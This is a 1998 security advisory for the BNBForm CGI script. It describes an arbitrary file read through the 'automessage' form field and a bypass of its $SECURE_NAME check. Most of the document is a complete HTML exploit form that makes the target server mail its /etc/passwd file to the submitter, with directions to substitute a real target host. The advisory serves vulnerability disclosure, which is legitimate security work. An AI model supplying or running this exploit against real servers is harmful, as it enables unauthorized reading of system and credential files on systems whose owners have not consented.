Vulnerable program: BNBForm (bnbform.cgi)
         Platforms: UNIX
	    Impact: remote users can read arbitrary files on the filesystem. 
	  Found By: duke (duke@viper.net.au - duke@el8.org)
     Advisory Made: Thursday, December 3, 1998

Information
-----------

BNBForm is a form processing cgi by BigNoseBird, and is available at:
http://bignosebird.com/carchive/bnbform.shtml. The problem is that this 
form sends a responding email to users with the contents of any file 
contained in the 'automessage' variable. This can be used to specify any 
file that is readable by the uid of the webserver. 

There is also a security mechanism in place to prevent you from running 
this cgi script off of forms on other servers, using a $SECURE_NAME 
variable, but this is easily bypassable by copying the "submit_to" field 
off of the intended form onto your malicious form. This mechanism is 
disabled by default.

Exploit
-------

The following form is a sample exploit. It will mail you the /etc/passwd 
file off of the server running the script. (If you get an empty email, 
check the headers of the mail). Change www.victim.com to your target, 
and fill in form. As previously mentioned, if $SECURE_NAME is set, you 
may have to add a hidden field for "submit_to" that is the same as the targets 
submit_to field.

<HTML>
<BODY BGCOLOR="#CCCCCC">
<CENTER>
<FONT FACE="ARIAL" SIZE="5"><B>BIGNOSEBIRD.COM's<BR>
ALL PURPOSE / ALL FUNCTION<BR>
FORM HANDLER</B></FONT><BR>
<I>with auto e-mail reply</I>!
</CENTER>
<P>

<FORM METHOD="POST" ACTION="http://www.victim.com/cgi-bin/bnbform.cgi">
<PRE>

 FIELDS MARKED WITH * ARE REQUIRED!

 Your Name:*          <INPUT TYPE="TEXT" NAME="name" SIZE=35 MAXLENGTH=50>

 E-Mail Address:*     <INPUT TYPE="TEXT" NAME="submit_by" SIZE=35 MAXLENGTH=50>

                      <INPUT TYPE="submit" VALUE="Send Mail!"><input type="reset" value=" Clear-Form">
</PRE>

<!--  SCRIPT CONFIGURATION SECTION -->
<INPUT TYPE="HIDDEN" NAME="required"
    VALUE="name">
<INPUT TYPE="HIDDEN" NAME="data_order"
    VALUE="name">
<INPUT TYPE="HIDDEN" NAME="autorespond" VALUE="yes">
<INPUT TYPE="HIDDEN" NAME="automessage" VALUE="/etc/passwd">
<INPUT TYPE="HIDDEN" NAME="form_id" VALUE="My Test Form">
<INPUT TYPE="HIDDEN" NAME="ok_url"
     VALUE="http://127.0.0.1/thanks.html">
<INPUT TYPE="HIDDEN" NAME="not_ok_url"
     VALUE="http://127.0.0.1/oops.html">
<!--  END OF SCRIPT CONFIGURATION SECTION -->
</FORM>

</BODY>
</HTML>




